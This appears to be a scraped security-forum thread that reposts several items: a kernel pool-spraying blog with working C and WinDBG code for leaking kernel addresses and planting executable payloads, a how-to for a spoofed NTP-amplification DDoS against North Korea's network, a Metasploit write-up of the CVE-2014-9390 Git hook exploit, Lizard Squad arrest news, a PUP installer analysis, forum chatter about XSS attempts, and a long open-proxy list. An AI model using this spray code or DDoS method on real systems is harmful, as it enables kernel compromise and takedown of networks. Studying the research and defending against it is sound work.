dump all the big pool allocations for you: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code]r? @$t0 = (nt!_POOL_TRACKER_BIG_PAGES*)@@(poi(nt!PoolBigPageTable)) r? @$t1 = *(int*)@@(nt!PoolBigPageTableSize) / sizeof(nt!_POOL_TRACKER_BIG_PAGES) .for (r @$t2 = 0; @$t2 < @$t1; r? @$t2 = @$t2 + 1) { r? @$t3 = @$t0[@$t2]; .if (@@(@$t3.Va != 1)) { .printf "VA: 0x%p Size: 0x%lx Tag: %c%c%c%c Freed: %d Paged: %d CacheAligned: %d\n", @@((int)@$t3.Va & ~1), @@(@$t3.NumberOfBytes), @@(@$t3.Key >> 0 & 0xFF), @@(@$t3.Key >> 8 & 0xFF), @@(@$t3.Key >> 16 & 0xFF), @@(@$t3.Key >> 24 & 0xFF), @@((int)@$t3.Va & 1), @@(@$t3.PoolType & 1), @@(@$t3.PoolType & 4) == 4 } }[/TD] [/TR] [/TABLE] Why are big pool allocations interesting? Unlike small pool allocations, which can share pages, and are hard to track for debugging purposes (without dumping the entire pool slush), big pool allocations are easy to enumerate. So easy, in fact, that the undocumented KASLR-be-damned API NtQuerySystemInformation has an information class specifically designed for dumping big pool allocations. Including not only their size, their tag, and their type (paged or nonpaged), but also their kernel virtual address! As previously presented, this API requires no privileges, and only in Windows 8.1 has it been locked down against low integrity callers (Metro/Sandboxed applications). With the little snippet of code below, you can easily enumerate all big pool allocations: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [/TD] [TD=class: code]// // Note: This is poor programming (hardcoding 4MB). // The correct way would be to issue the system call // twice, and use the resultLength of the first call // to dynamically size the buffer to the correct size // bigPoolInfo = RtlAllocateHeap(RtlGetProcessHeap(), 0, 4 * 1024 * 1024); if (bigPoolInfo == NULL) goto Cleanup; res = NtQuerySystemInformation(SystemBigPoolInformation, bigPoolInfo, 4 * 1024 * 1024, &resultLength); if (!NT_SUCCESS(res)) goto Cleanup; printf("TYPE ADDRESS\tBYTES\tTAG\n"); for (i = 0; i < bigPoolInfo->Count; i++) { printf("%s0x%p\t0x%lx\t%c%c%c%c\n", bigPoolInfo->AllocatedInfo[i].NonPaged == 1 ? "Nonpaged " : "Paged ", bigPoolInfo->AllocatedInfo[i].VirtualAddress, bigPoolInfo->AllocatedInfo[i].SizeInBytes, bigPoolInfo->AllocatedInfo[i].Tag[0], bigPoolInfo->AllocatedInfo[i].Tag[1], bigPoolInfo->AllocatedInfo[i].Tag[2], bigPoolInfo->AllocatedInfo[i].Tag[3]); } Cleanup: if (bigPoolInfo != NULL) { RtlFreeHeap(RtlGetProcessHeap(), 0, bigPoolInfo); }[/TD] [/TR] [/TABLE] [h=2]Pool Control[/h] Obviously, it’s quite useful to have all these handy kernel-mode addresses. But what can we do to control their data, and not only be able to read their address? You may be aware of previous techniques where a user-mode attacker allocates a kernel-object (say, an APC Reserve Object), which has a few fields that are user-controlled, and which then has an API to get its kernel-mode address. We’re essentially going to do the same here, but rely on more than just a few fields. Our goal, therefore, is to find a user-mode API that can give us full control over the kernel-mode data of a kernel object, and additionally, to result in a big pool allocation. This isn’t as hard as it sounds: anytime a kernel-mode component allocates over the limits above, a big pool allocation is done instead. Therefore, the exercise reduces itself to finding a user-mode API that can result in a kernel allocation of over 4KB, whose data is controlled. And since Windows XP SP2 and later enforce kernel-mode non-executable memory, the allocation should be executable as well. Two easy examples may popup in your head: Creating a local socket, listening to it, connecting from another thread, accepting the connection, and then issuing a write of > 4KB of socket data, but not reading it. This will result in the Ancillary Function Driver for WinSock (AFD.SYS), also affectionally known as “Another F*cking Driver”, allocating the socket data in kernel-mode memory. Because the Windows network stack functions at DISPATCH_LEVEL (IRQL 2), and paging is not available, AFD will use a nonpaged pool buffer for the allocation. This is great, because until Windows 8, nonpaged pool is executable! Creating a named pipe, and issuing a write of > 4KB of data, but not reading it. This will result in the Named Pipe File System (NPFS.SYS) allocating the pipe data in a nonpaged pool buffer as well (because NPFS performs buffer management at DISPATCH_LEVEL as well). Ultimately, #2 is a lot easier, requiring only a few lines of code, and being much less inconspicuous than using sockets. The important thing you have to know is that NPFS will prefix our buffer with its own internal header, which is called a DATA_ENTRY. Each version of NPFS has a slightly different size (XP- vs 2003+ vs Windows 8+). I’ve found that the cleanest way to handle this, and not to worry about offsets in the final kernel payload, is to internally handle this in the user-mode buffer with the right offsets. And finally, remember that the key here is to have a buffer that’s at least the size of a page, so we can force the big pool allocator. Here’s a little snippet that keeps all this into account and will have the desired effects: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [/TD] [TD=class: code]UCHAR payLoad[PAGE_SIZE - 0x1C + 44]; // // Fill the first page with 0x41414141, and the next page // with INT3's (simulating our payload). On x86 Windows 7 // the size of a DATA_ENTRY is 28 bytes (0x1C). // RtlFillMemory(payLoad, PAGE_SIZE - 0x1C, 0x41); RtlFillMemory(payLoad + PAGE_SIZE - 0x1C, 44, 0xCC); // // Write the data into the kernel // res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payLoad)); if (res == FALSE) goto Cleanup; res = WriteFile(writePipe, payLoad, sizeof(payLoad), &resultLength, NULL); if (res == FALSE) goto Cleanup; // // extra code goes here... // Cleanup: CloseHandle(writePipe); CloseHandle(readPipe);[/TD] [/TR] [/TABLE] Now all we need to know is that NPFS uses the pool tag ‘NpFr’ for the read data buffers (you can find this out by using the !pool and !poolfind commands in WinDBG). We can then change the earlier KASLR-defeating snippet to hard-code the pool tag and expected allocation size, and we can instantly find the kernel-mode address of our buffer, which will fully match our user-mode buffer. Keep in mind that the “Paged vs. Nonpaged” flag is OR’ed into the virtual address (this is different from the structure in the kernel, which tracks free vs. allocated), so we’ll mask that out, and also make sure you align the size to the pool header alignment (it’s enforced even for big pool allocations). Here’s that snippet, for x86 Windows: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [/TD] [TD=class: code]// // Based on pooltag.txt, we're looking for the following: // NpFr - npfs.sys - DATA_ENTRY records (r/w buffers) // for (entry = bigPoolInfo->AllocatedInfo; entry < (PSYSTEM_BIGPOOL_ENTRY)bigPoolInfo + bigPoolInfo->Count; entry++) { if ((entry->NonPaged == 1) && (entry->TagUlong == 'rFpN') && (entry->SizeInBytes == ALIGN_UP(PAGE_SIZE + 44, ULONGLONG))) { printf("Kernel payload @ 0x%p\n", (ULONG_PTR)entry->VirtualAddress & ~1 + PAGE_SIZE); break; } }[/TD] [/TR] [/TABLE] And here’s the proof in WinDBG: Voila! Package this into a simple “kmalloc” helper function, and now you too, can allocate executable, kernel-mode memory, at a known address! How big can these allocations get? I’ve gone up to 128MB without a problem, but this being non-paged pool, make sure you have the RAM to handle it. Here’s a link to some sample code which implements exactly this functionality. An additional benefit of this technique is that not only can you get the virtual address of your allocation, you can even get the physical address! Indeed, as part of the undocumented Superfetch API that I first discovered and implemented in my meminfo tool, which has now been supplanted by the RAMMap utility from SysInternals, the memory manager will happily return the pool tag, virtual address, and physical address of our allocation. Here’s a screenshot of RAMMap showing another payload allocation and its corresponding physical address (note that the 0x1000 difference is since the command-line PoC biases the pointer, as you saw in the code). [h=2]Next Steps[/h] Now, for full disclosure, there are a few additional caveats that make this technique a bit less sexy in 2015 — and why I chose to talk about it today, and not 8 years ago when I first stumbled upon it: 1) Starting with Windows 8, nonpaged pool allocations are now non-executable. This means that while this trick still lets you spray the pool, your code will require some sort of NX bypass first. So you’ve gone from bypassing SMEP to bypassing kernel-mode NX. 2) In Windows 8.1, the API to get the big pool entries and their addresses is no longer usable by low-integrity callers. This significantly reduces the usefulness in local-remote attacks, since those are usually launched through sandboxed applications (Flash, IE, Chrome, etc) and/or Metro containers. Of course, there are some ways around this — a sandbox escape is often used in local-remote attacks anyway, so #2 can become moot. As for #1, some astute researchers have already figured out that NX was not fully deployed — for example, Session Pool allocations, are STILL executable on newer versions of Windows, but only on x86 (32-bit). I leave it as an exercise to readers to figure out how this technique can be extended to leverage that (hint: there’s a ‘Big Session Pool’). But what about a modern, 64-bit version of Windows, say even Windows 10? Well, this technique appears to be mostly dead on such systems — or does it? Is everything truly NX in the kernel, or are there still some sneaky ways to get some executable memory, and to get its address? I’ll be sure to blog about it once Windows 14 is out the door in 2022. © Alex Ionescu Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool « Alex Ionescu’s Blog

[h=3]Anybody can take North Korea offline[/h] By Robert Graham A couple days after the FBI blamed the Sony hack on North Korea, that country went offline. Many suspected the U.S. government, but the reality is that anybody can do it -- even you. I mention this because of a Vox.com story that claims "There is no way that Anonymous pulled off this scale of an attack on North Korea". That's laughably wrong, overestimating the scale of North Korea's Internet connection, and underestimating the scale of Anonymous's capabilities. North Korea has a roughly ~10-gbps link to the Internet for it's IP addresses. That's only about ten times what Google fiber provides. In other words, 10 American households can have as much bandwidth as the entire country. Anonymous's capabilities exceed this, scaling past 1-terabit/second, or a hundred times more than needed to take down North Korea. Attacks are made easier due to amplifiers on the Internet, which can increase the level of traffic by about 100 times. Thus, in order to overload a 10-gbps link of your target, you only need a 100-mbps link yourself. This is well within the capabilities of a single person. Such attacks are difficult to do from your home, because your network connection is asymmetric. A 100-mbps from Comcast refers to the download speed -- it's only about 20-mbps in the other direction. You'll probably need to use web host services that sell high upload speed. You can cheaply get a 100-mbps or even 1-gbps upload connection for about $30 per month in bitcoin. You'll need to find one that doesn't do egress filtering, because you'll be spoofing North Korea's addresses, but that's rarely a problem. You need some familiarity with command-line tools. In this age of iPads, the command-line seems like Dark Magic to some people, but it's something all computer geeks use regularly. Thus, to do these attacks, you'll need some basic geek skills, but they are something that can be acquired in a week. How I would do it is roughly shown by the following command-line command. This uses some software I wrote for port-scanning, but as a side effect, it can also be used for these sorts of "amplified DDoS" attacks. What we see in this command-line is the following: use spoofing as part of the attack targeting the North Korean IP addresses around 175.45.176.0 bouncing the packets off a list of amplifiers building a custom NTP monlist packet that causes amplification sending to port 123 (NTP) sending at a rate of one million packets/second repeating the attack infinitely (never stopping) For this attack to work, you'll need a list of amplifiers. You can find these lists in hacker forums, or you can just find the amplifiers yourself using masscan (after all, that's what port scanners are supposed to do). I use masscan in my example because it's my tool, so it's how I'd do it, but no special tool is needed. You can write you own code to do it pretty easily, and there are tons of other tools that can be configured to do this. I stress this because people have this belief in the power of cyberweapons, that powerful effects like disabling a country can't happen without powerful weapons. This belief is nonsense. It's unknown if Anonymous hackers actually DDoSed North Korea, like the "Lizard Square" that claims responsibility, but it's easily within their capabilities. What's actually astonishing is that since millions of people can so easily DDoS North Korea why it doesn't happen more often. Note: This only takes down one aspect of the North Korean Internet. Satellite links, other telephony links, cell phones, and the ".kp" domain names would still be unaffected. It would take some skill to attack all those possibilities, but it appears that the hackers only did the simple DDoS. Sursa: Errata Security: Anybody can take North Korea offline

Umflatu'

[h=1]12 Days of HaXmas: Exploiting CVE-2014-9390 in Git and Mercurial[/h]Posted by jhart in Metasploit on Jan 1, 2015 2:18:22 PM This post is the eighth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. A week or two back, Mercurial inventor Matt Mackall found what ended up being filed as CVE-2014-9390. While the folks behind CVE are still publishing the final details, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial clients (before version 3.2.3) contained three vulnerabilities that allowed malicious Git or Mercurial repositories to execute arbitrary code on vulnerable clients under certain circumstances. To understand these vulnerabilities and their impact, you must first understand a few basic things about Git and Mercurial clients. Under the hood, a Git or Mercurial repository on disk is really just a directory. In this directory is another specially named directory (.git for Git, .hg for Mercurial) that contains all of the configuration files and metadata that makes up the repository. Everything else outside of this special directory is just a pile of files and directories, often called the working directory, written to disk based on the previous mentioned metadata. So, in a way, if you had a Git repository called Test, Test/.hg is the repository and everything else under the Test directory is simply a working copy of of the files contained in the repository at a particular point in time. An nearly identical concept also exists in Mercurial. Here is a quick example of a simple Git repository that contains has no files committed to it. As you can see, even this empty repository has a fair amount of metadata and a number of configuration files: $ git init foo $ tree -a foo foo ??? .git ??? branches ??? config ??? description ??? HEAD ??? hooks ? ??? applypatch-msg.sample ? ??? commit-msg.sample ? ??? post-update.sample ? ??? pre-applypatch.sample ? ??? pre-commit.sample ? ??? prepare-commit-msg.sample ? ??? pre-rebase.sample ? ??? update.sample ??? info ? ??? exclude ??? objects ? ??? info ? ??? pack ??? refs ??? heads ??? tags If you then add a single file to it called test.txt, you can see how the directory starts to change as the raw objects are added to the .git/objects directory: $ cd foo $ date > test.txt && git add test.txt && git commit -m "Add test.txt" -a [master (root-commit) fb19d8e] Add test.txt 1 file changed, 1 insertion(+) create mode 100644 test.txt $ git log commit fb19d8e1e5db83b4b11bbd7ed91e1120980a38e0 Author: Jon Hart Date: Wed Dec 31 09:08:41 2014 -0800 Add test.txt $ tree -a . . ??? .git ? ??? branches ? ??? COMMIT_EDITMSG ? ??? config ? ??? description ? ??? HEAD ? ??? hooks ? ? ??? applypatch-msg.sample ? ? ??? commit-msg.sample ? ? ??? post-update.sample ? ? ??? pre-applypatch.sample ? ? ??? pre-commit.sample ? ? ??? prepare-commit-msg.sample ? ? ??? pre-rebase.sample ? ? ??? update.sample ? ??? index ? ??? info ? ? ??? exclude ? ??? logs ? ? ??? HEAD ? ? ??? refs ? ? ??? heads ? ? ??? master ? ??? objects ? ? ??? 1c ? ? ? ??? 8fe13acf2178ea5130480625eef83a59497cb0 ? ? ??? 4b ? ? ? ??? 825dc642cb6eb9a060e54bf8d69288fbee4904 ? ? ??? e5 ? ? ? ??? 58a44cf7fca31e7ae5f15e370e9a35bd1620f7 ? ? ??? fb ? ? ? ??? 19d8e1e5db83b4b11bbd7ed91e1120980a38e0 ? ? ??? info ? ? ??? pack ? ??? refs ? ??? heads ? ? ??? master ? ??? tags ??? test.txt Similarly, for Mercurial: $ hg init blah $ tree -a blah blah ??? .hg ??? 00changelog.i ??? requires ??? store 2 directories, 2 files $ cd blah $ date > test.txt && hg add test.txt && hg commit -m "Add test.txt" $ hg log changeset: 0:ea7dac4a11f0 tag: tip user: Jon Hart date: Wed Dec 31 09:25:07 2014 -0800 summary: Add test.txt $ tree -a . . ??? .hg ? ??? 00changelog.i ? ??? cache ? ? ??? branch2-served ? ??? dirstate ? ??? last-message.txt ? ??? requires ? ??? store ? ? ??? 00changelog.i ? ? ??? 00manifest.i ? ? ??? data ? ? ? ??? test.txt.i ? ? ??? fncache ? ? ??? phaseroots ? ? ??? undo ? ? ??? undo.phaseroots ? ??? undo.bookmarks ? ??? undo.branch ? ??? undo.desc ? ??? undo.dirstate ??? test.txt These directories (.git, .hg) are created by a client when the repository is initially created or cloned. The contents of these directories can be modified by users to, for example, configure repository options (.git/config for Git, .hg/hgrc for Mercurial), and are routinely modified by Git and Mercurial clients as part of normal operations on the repository. Simplified, the .hg and .git directories contain everything necessary for the repository to operate, and everything outside of these directories is considered is considered part of the working directory, namely the contents of the repository itself (test.txt in my simplified examples). Want to learn more? Git Basics and Understanding Mercurial are great resources. During routine repository operations such as cloning, updating, committing, etc, the repository working directory is updated to reflect the current state of the repository. Using the examples from above, upon cloning either of these repositories, the local clone of the repository would be updated to reflect the current state of test.txt. This is where the trouble begins. Both Git and Mercurial clients have had code for a long time that ensures that no commits are made to anything in the .git or .hg directories. Because these directories control client side behavior of a Git or Mercurial repository, if they were not protected, a Git or Mercurial server could potentially manipulate the contents of certain sensitive files in the repository that could cause unexpected behavior when a client performs certain operations on the repository. Unfortunately these sensitive directories were not properly protected in all cases. Specifically: On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. While a commit to a file under .git (all lower case) would be blocked, a commit to .giT (partially lower case) would not be blocked and would result in .git being modified because .git is equivalent to .giT on a case-insensitive file system. These same Git clients as well as Mercurial versions before 3.2.3 have a nearly identical vulnerability that affects HFS+ file systems (OS X and Windows) where certain Unicode codepoints are ignored in file names. Mercurial before 3.2.3 on Windows has a nearly identical vulnerability on Windows only where MS-DOS file "short names" or 8.3 formats are possible. Basic exploitation of the first vulnerability is fairly simple to do with basic Git commands as I described in #4435, and the commits that fix the second and third vulnerabilities show simple examples of how to exploit it. But basic exploitation is boring so in #4440 I've spiced things up a bit. As currently written, this module exploits the first of these three vulnerabilities by launching an HTTP server designed to simulate a Git repository accessed over HTTP, which is one of the most common ways to interact with Git. Upon cloning this repository, vulnerable clients will be convinced to overwrite Git hooks, which are shell scripts that get executed when certain operations happen (committing, updating, checkout, etc). By default, this module overwrites the .git/hooks/post-checkout script which is executed upon completion of a checkout, which conveniently happens at clone time so the simple act of cloning a repository can allow arbitrary code execution on the Git client. It goes a little bit further and provides some simplistic HTML in the hopes of luring in potentially vulnerable clients: And, if you clone it, it only looks mildly suspicious: $ git clone http://10.0.1.18:8080/ldf.git Cloning into 'ldf'... $ cd ldf $ git log commit 858597e39d8a5d8e3511d404bcb210948dc835ae Author: Deborah Phillips Date: Thu Apr 29 17:44:02 2004 -0500 Initial commit to open git repository for nf.tygzxwf.xnk0lycynl.org! The module has the beginnings of support for the second and third vulnerabilities, so this particular #haxmas gift may need some work by you, the Metasploit community. Enjoy! Sursa: https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial

Two alleged members of Lizard Squad arrested following Xbox Live/PSN Christmas attacks Hayden Dingman @haydencd Did you spend Christmas mildly annoyed because you bought a new console, only to find that Xbox Live/ PlayStation Network had been downed by a "nefarious" group known as Lizard Squad? Yes, I know it sounds like a bad episode of 24, but at least now you can revel in a bit of Schadenfreude: Two alleged members have been arrested this week. Lizard Squad came to prominence in 2014 after taking down (or at least claiming to take down) the online presences of numerous gaming companies, including Blizzard, Activision, and Sony. Oh, and perpetrating a bomb threat against a Sony executive in August. Its biggest (or at least most noticeable) moment came just this past week though, when Lizard Squad launched simultaneous DDOS attacks on Xbox Live and PlayStation Network. On Christmas. And then offered to sell its own DDoS tool to others. "Flying too close to the sun" comes to mind. If this week is anything to go by, Lizard Squad is quickly unraveling. The first arrest was reported by Brian Krebs, who writes about security matters on his website Krebs On Security. On Monday he posted a bail document pertaining to one Vinnie Omari, a 22-year-old from Britain who is allegedly part of Lizard Squad. Omari later told The Daily Dot, "they took everything." The police raided Omari's home on Monday and took his computers for evidence, though Omari is out on bail until his hearing in March. To top it off, Finland's National Bureau of Investigation (NBI) picked up another alleged member of Lizard Squad later in the week. The 17-year-old, known as "Ryan," acted as spokesperson for the group in the aftermath of the Christmas attacks. Unlike Omari, Lizard Squad told The Washington Post that Ryan remains in jail. Sursa: Two alleged members of Lizard Squad arrested following Xbox Live/PSN Christmas attacks | PCWorld

Potentially Unwanted Program borrows tricks from malware authors December 31, 2014 | BY Jérôme Segura These days it is getting harder and harder to download a program from its official source, in its original format, without additional pieces of software bundled to it. Companies specializing in so-called ‘download assistants’ or ‘download managers’ claim that they: Provide a value added service to users by suggesting additional programs tailored to the users’ needs. Offer a way for software manufacturers to monetize their free applications. Let’s have a look for ourselves by checking an installer for the Adobe Flash Player. The details are as follows: Name: adobe_flash_setup.exe Size: 809.0 KB MD5: d549def7dd9006954839a187304e3835 imphash: 884310b1928934402ea6fec1dbd3cf5e Out of the box The first thing we noticed was that the program behaves differently whether it is launched on a real physical machine or a Virtual Machine, as described in the diagram below: In a VM such as VirtualBox, the installer skips all the bundled offers and goes straight for the Flash Player. By reverse engineering the installer, we can confirm the detection of Virtual Machines: “VirtualMachine mode – remote offers disabled” There might be a few reasons for this: To avoid unnecessary impressions and installs on ‘fake’ systems that would skew metrics. To appear as a ‘clean’ installer when installed on automated sandboxes or by hand from security researchers. Anti-vm behavior does not necessarily mean that the application is malicious, but it is something that many malware authors use. Time stamp The program was compiled with a date of June 19th 1992, long before PUPs even existed: By using an older time stamp, the program looks less suspicious and it is a technique that we observe with certain malware samples. [Edit] @Hexacorn commented that this is actually a bug with the Delphi programming language. Digital footprint The file was digitally signed by Fried Cookie Ltd. A digital certificate is a trust of authenticity but can be abused and certainly can be used to ‘boost’ a program’s credibility. The certificate details show that said company is located in Tel Aviv, Israel and a VirusTotal scan hints at a connection with InstallCore, a “digital content delivery platform”. The link between thetwo companies can be established from this blog statement: In early 2013, Fried Cookie proudly announced a formal partnership with installCore. We are now both under the ironSource umbrella of products. The offers The first offer cannot be opted out from, you must accept it in order to keep going: This mandatory offer installs the Vosteran Browser, a Chromium-based browser created by Fried Cookie Ltd. Most searches to download the Vosteran Browser on its own return results for how to remove it instead: Finally, Vosteran’s privacy policy states that: We may also use a third party tracking service that uses cookies (analytics) to track aggregate non-Personal Identifiable Information regarding our Software and/or Services. Please note that We have no control over third parties privacy policies. This essentially means that Vosteran Search cannot be held liable for abuses committed by third parties. There are also various other offers bundled in this installer, courtesy of “distributer” called Entarion Ltd., with an “address” conveniently located in Cyprus, well-known as a safe haven for offshore companies. d.updateweb.org softwareportals@gmail.com Stratigou Spyrou Stathopoulou, 14B, 3066, Limassol, Cyprus Note that the domain is using Privacy Protect to hide the registrant’s details. However, a search on the Gmail address shows that there is another domain seemingly belonging to an individual in St Petersburg, Russia. It doesn’t take too long to find several reports of unwanted pop-ups aggressively pushing bogus registry cleaners many of which are funneled through securedshopgate.com a well hidden portal with an SSL certificate tied to an address in Cyprus, once again: Installing the Flash Player from this installer is not an easy task due to the large number of promoted software: It could be argued that this particular example is not the norm and that most download managers do explicitly let the user choose or decline additional pieces of software that have been vetted as legitimate. However, opposite examples do exist as well and do cause a lot of headaches and large amounts of money spent on programs whose effectiveness can be questioned. To quickly remove any trace from these Potentially Unwanted Programs (PUPs), you can download and run Malwarebytes Anti-Malware: Malwarebytes’ criteria for listing a program as a PUP can be viewed here. The lists is pretty thorough and will most likely continue to evolve as PUP makers diversify their operations. Consumers should be able to make educated choices rather than being mislead down a path that they didn’t intend to take. Unfortunately, because software bundles are such an attractive business model from a financial standpoint, the line between legitimate and fraudulent gets crossed too many times. Special thanks to Adrian Gill, Joshua Cannell and JP Taggart for additional research assistance. Sursa: https://blog.malwarebytes.org/fraud-scam/2014/12/potentially-unwanted-program-borrows-tricks-from-malware-authors/

Pe RST nu a mers, si nu am facut nimic special. Imi facea strip la <script>. Am incercat si alti vectori si tot nu a mers. Am mai incercat pe inca un blog si la fel, nu a mers. PS: Nu va chinuiti sa incercati pe RST. wp-comments-post.php $comment_content = ( isset($_POST['comment']) ) ? trim($_POST['comment']) : null; in $comment_content = ( isset($_POST['comment']) ) ? trim(htmlentities($_POST['comment'], ENT_QUOTES)) : null;

Nu prea a mers...

E Revelionu, nu sta nimeni azi de asa ceva

[h=1]31-12-14 | Free SSL Proxies (3103)[/h]By: gelbeseiten on Dec 30th, 2014 31-12-14 | Free SSL Proxies (3103) Checked & filtered (Secure Socket Layer Proxies) 1.160.13.205:8080 1.162.161.4:9064 1.163.201.41:9064 1.163.80.130:9064 1.164.112.136:9064 1.164.181.116:9064 1.165.162.128:8080 1.169.241.25:9064 1.170.23.91:9064 1.172.22.93:9064 1.172.54.152:9064 1.173.4.78:9064 1.173.63.122:9064 1.174.62.50:9064 1.175.121.231:9064 1.186.217.7:9064 1.186.239.132:9064 1.23.213.99:9064 1.93.8.169:3128 101.1.16.123:3128 101.63.203.130:9064 103.17.164.185:80 103.233.183.6:8080 103.29.221.167:80 103.29.221.20:80 103.41.176.1:7808 104.131.119.230:3128 104.131.122.190:3128 106.37.177.251:3128 107.170.216.78:3128 107.182.17.243:7808 107.182.17.243:8089 109.104.144.42:8080 110.117.90.185:8123 110.232.83.38:8080 111.10.100.136:8123 111.10.100.227:8123 111.10.100.65:8123 111.10.102.43:8123 111.10.103.14:8123 111.10.112.199:8123 111.10.113.183:8123 111.10.117.54:8123 111.10.118.112:8123 111.10.118.159:8123 111.10.129.1:8123 111.10.132.219:8123 111.10.136.167:8123 111.10.137.183:8123 111.10.137.213:8123 111.10.137.94:8123 111.10.139.191:8123 111.10.139.72:8123 111.10.14.106:8123 111.10.144.102:8123 111.10.144.150:8123 111.10.145.188:8123 111.10.145.65:8123 111.10.146.113:8123 111.10.146.235:8123 111.10.146.251:8123 111.10.146.6:8123 111.10.147.135:8123 111.10.147.165:8123 111.10.147.19:8123 111.10.147.216:8123 111.10.147.27:8123 111.10.15.162:8123 111.10.152.119:8123 111.10.152.16:8123 111.10.152.163:8123 111.10.152.71:8123 111.10.153.80:8123 111.10.154.11:8123 111.10.155.239:8123 111.10.155.71:8123 111.10.158.149:8123 111.10.162.152:8123 111.10.164.100:8123 111.10.164.120:8123 111.10.165.253:8123 111.10.166.122:8123 111.10.166.51:8123 111.10.167.176:8123 111.10.167.31:8123 111.10.175.240:8123 111.10.178.217:8123 111.10.180.230:8123 111.10.185.126:8123 111.10.186.0:8123 111.10.186.139:8123 111.10.187.185:8123 111.10.187.55:8123 111.10.188.67:8123 111.10.192.17:8123 111.10.192.96:8123 111.10.193.175:8123 111.10.194.124:8123 111.10.195.69:8123 111.10.196.177:8123 111.10.196.85:8123 111.10.196.88:8123 111.10.197.35:8123 111.10.197.50:8123 111.10.198.251:8123 111.10.199.47:8123 111.10.219.154:8123 111.10.29.114:8123 111.10.29.143:8123 111.10.39.115:8123 111.10.45.179:8123 111.10.48.123:8123 111.10.49.104:8123 111.10.50.119:8123 111.10.50.225:8123 111.10.72.212:8123 111.10.74.150:8123 111.10.88.162:8123 111.10.88.82:8123 111.10.90.214:8123 111.10.91.56:8123 111.10.96.11:8123 111.10.96.174:8123 111.10.96.54:8123 111.10.97.104:8123 111.10.97.154:8123 111.10.97.202:8123 111.10.97.218:8123 111.10.97.229:8123 111.10.97.239:8123 111.10.98.63:8123 111.11.246.153:8123 111.161.126.100:80 111.161.126.101:80 111.161.126.98:80 111.161.126.99:80 111.2.240.156:8123 111.241.252.11:9064 111.242.162.241:9064 111.242.42.248:9064 111.243.93.199:9064 111.249.155.210:9064 111.251.216.197:9064 111.253.235.46:9064 111.253.62.235:9064 111.254.184.58:9064 111.254.198.107:9064 111.255.135.146:9064 111.255.62.21:9064 111.73.240.176:8123 111.9.174.250:8123 111.9.174.44:8123 111.9.234.71:8123 111.9.243.49:8123 111.91.90.190:9064 111.94.116.56:9064 112.0.104.161:8123 112.0.104.52:8123 112.0.119.47:8123 112.0.206.168:8123 112.0.21.153:8123 112.0.212.120:8123 112.0.217.7:8123 112.0.29.43:8123 112.1.160.206:8123 112.1.167.2:8123 112.1.184.59:8123 112.15.120.54:8123 112.15.24.11:8123 112.15.25.155:8123 112.15.29.109:8123 112.15.62.149:8123 112.15.87.38:8123 112.18.11.245:8123 112.18.152.14:8123 112.18.154.101:8123 112.18.157.79:8123 112.18.159.117:8123 112.18.159.151:8123 112.18.159.245:8123 112.18.159.36:8123 112.18.160.34:8123 112.18.160.48:8123 112.18.163.120:8123 112.18.163.174:8123 112.18.164.184:8123 112.18.164.94:8123 112.18.165.160:8123 112.18.165.2:8123 112.18.166.185:8123 112.18.166.211:8123 112.18.166.222:8123 112.18.166.249:8123 112.18.167.128:8123 112.18.167.131:8123 112.18.168.142:8123 112.18.170.139:8123 112.18.170.15:8123 112.18.171.32:8123 112.18.171.4:8123 112.18.175.125:8123 112.18.175.142:8123 112.18.176.142:8123 112.18.176.165:8123 112.18.176.99:8123 112.18.178.133:8123 112.18.178.15:8123 112.18.178.90:8123 112.18.179.240:8123 112.18.187.133:8123 112.18.196.149:8123 112.18.197.85:8123 112.18.199.109:8123 112.18.199.152:8123 112.18.20.130:8123 112.18.21.41:8123 112.18.23.248:8123 112.18.24.43:8123 112.18.49.53:8123 112.18.56.186:8123 112.18.62.231:8123 112.18.65.203:8123 112.18.75.18:8123 112.18.79.154:8123 112.193.165.27:8118 112.196.44.26:9064 112.197.183.181:9064 112.20.130.11:8123 112.20.134.186:8123 112.20.246.58:8123 112.21.225.72:8123 112.21.242.52:8123 112.21.250.161:8123 112.22.230.167:8123 112.22.234.165:8123 112.22.245.250:8123 112.23.121.3:8123 112.23.227.10:8123 112.24.126.78:8123 112.24.136.47:8123 112.24.61.131:8123 112.24.78.53:8123 112.24.92.154:8123 112.24.94.199:8123 112.24.94.24:8123 112.3.100.176:8123 112.3.104.8:8123 112.3.105.162:8123 112.3.124.201:8123 112.3.135.88:8123 112.3.202.148:8123 112.3.211.218:8123 112.44.226.140:8123 112.44.226.43:8123 112.44.227.202:8123 112.44.230.150:8123 112.44.234.57:8123 112.44.236.5:8123 112.44.242.197:8123 112.44.243.74:8123 112.44.247.105:8123 112.44.250.170:8123 112.44.251.41:8123 112.44.252.76:8123 112.45.179.183:8123 112.45.179.189:8123 112.45.179.191:8123 112.45.183.43:8123 112.45.185.235:8123 112.45.188.163:8123 112.65.44.71:3128 112.95.106.141:9999 112.95.204.11:9999 112.95.76.182:9000 113.119.205.252:9999 113.193.104.21:9064 113.193.160.150:9064 113.201.63.12:80 113.245.195.3:8118 113.252.146.176:3128 113.87.18.234:9999 113.87.82.249:9999 114.215.237.93:3128 114.25.161.229:9064 114.27.218.101:9064 114.27.226.126:9064 114.36.146.246:9064 114.36.151.215:9064 114.37.200.171:9064 114.37.43.236:9064 114.37.55.219:9064 114.37.94.32:9064 114.38.105.123:9064 114.38.60.45:9064 114.38.61.121:9064 114.40.157.7:9064 114.40.251.63:9064 